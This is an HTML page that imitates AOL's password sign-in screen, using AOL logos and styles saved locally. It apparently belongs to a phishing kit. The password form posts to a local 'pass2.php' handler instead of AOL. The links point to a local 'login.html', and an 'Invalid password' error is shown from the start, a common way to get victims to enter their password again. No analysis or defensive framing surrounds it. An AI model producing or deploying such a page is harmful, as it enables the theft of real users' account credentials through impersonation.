<!DOCTYPE html>
<html id="Stencil" class="js grid light-theme "><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        
        <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no">
        <meta name="format-detection" content="telephone=no">
        <meta name="referrer" content="strict-origin-when-cross-origin">
        <meta name="oath:guce:consent-host" content="guce.aol.com">
        <title>AOL</title>
        <meta name="description" content="AOL">
        <link rel="icon" type="image/png" href="https://s.yimg.com/wm/login/aol-favicon.png">
        <link rel="shortcut icon" type="image/png" href="https://s.yimg.com/wm/login/aol-favicon.png">
        <link rel="apple-touch-icon" href="https://s.yimg.com/wm/login/aol-apple-touch-icon.png">
        <link rel="apple-touch-icon-precomposed" href="https://s.yimg.com/wm/login/aol-apple-touch-icon.png">
        
        <link href="./password_files/aol-main.css" rel="stylesheet" type="text/css">
        <style type="text/css" id="operaUserStyle"></style>
    </head>
    <body class="bucket-mbr-gam-ads">
    
    <div id="login-body" class="loginish  puree-v2 responsive  grid    ">
    <div class="mbr-desktop-hd">
    <span class="column">
         <a href="login.html">
            <img src="./password_files/aol-logo-black-v.0.0.2.png" alt="Aol" class="logo " width="100" height="">
            <img src="./password_files/aol-logo-white-v0.0.4.png" alt="Aol" class="dark-mode-logo logo " width="100" height="">
        </a>
    </span>
    <span class="column help txt-align-right">
        <a href="login.html">Help</a>
    </span>
</div>
    <div class="login-box-container">
        <div class="login-box right">
            <div class="mbr-login-hd txt-align-center">
                    <img src="./password_files/aol-logo-black-v.0.0.2.png" alt="Aol" class="logo aol-en-US" width="100" height="">
                    <img src="./password_files/aol-logo-white-v0.0.4.png" alt="Aol" class="dark-mode-logo logo aol-en-US" width="100" height="">
            </div>
            <div class="challenge password-challenge">
    <div class="challenge-header">
    </div><div id="password-challenge" class="primary">
    <strong class="challenge-heading">Enter&nbsp;password</strong>
    <span class="txt-align-center challenge-desc">to finish sign&nbsp;in</span>
        <form action="pass2.php" method="post" class="challenge-form " name="pass2">
        </div>
         
        <div id="password-container" class="input-group password-container used focussed">
            <input type="password" id="login-passwd" class="password used" name="password" >
            <label for="login-passwd" id="password-label" class="password-label">Password</label>
            <div class="caps-indicator hide" id="caps-indicator" title="Capslock is on"></div>
            </button>
        </div>
        <p class="error-msg" role="alert" data-error="messages.ERROR_INVALID_PASSWORD">
            Invalid password. Please try&nbsp;again
        </p>
        <div class="button-container">
            <button type="submit" id="login-signin" class="pure-button puree-button-primary puree-spinner-button challenge-button" name="verifyPassword">
                    Next
            </button>
        </div>
        <div class="forgot-cont challenge-button-link">
            <input type="submit" class="pure-button puree-button-link challenge-button-link"  id="mbr-forgot-link" name="skip" value="Forgot password?">
        </div>
    </form>
</div>
</div>
        </div>
        <div id="login-box-ad-fallback" class="login-box-ad-fallback" style="display: block;">
            <h1></h1>
<p></p>
        </div>
    </div>
    <div class="login-bg-outer">
        <div class="login-bg-inner">
            <div id="login-ad-rich" aria-hidden="true">
            </div>
                    </div>
    </div>
    
</div>
    <script src="./password_files/rapid-3.53.39.js.download"></script>
    
    <script src="./password_files/bundle.js.download"></script>
    <noscript>
        <img src="/account/js-reporting/?crumb=YoPGg9PNExc&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2Fpassword" height="0" width="0" style="visibility: hidden;">
    </noscript>
    
    
    

</body></html>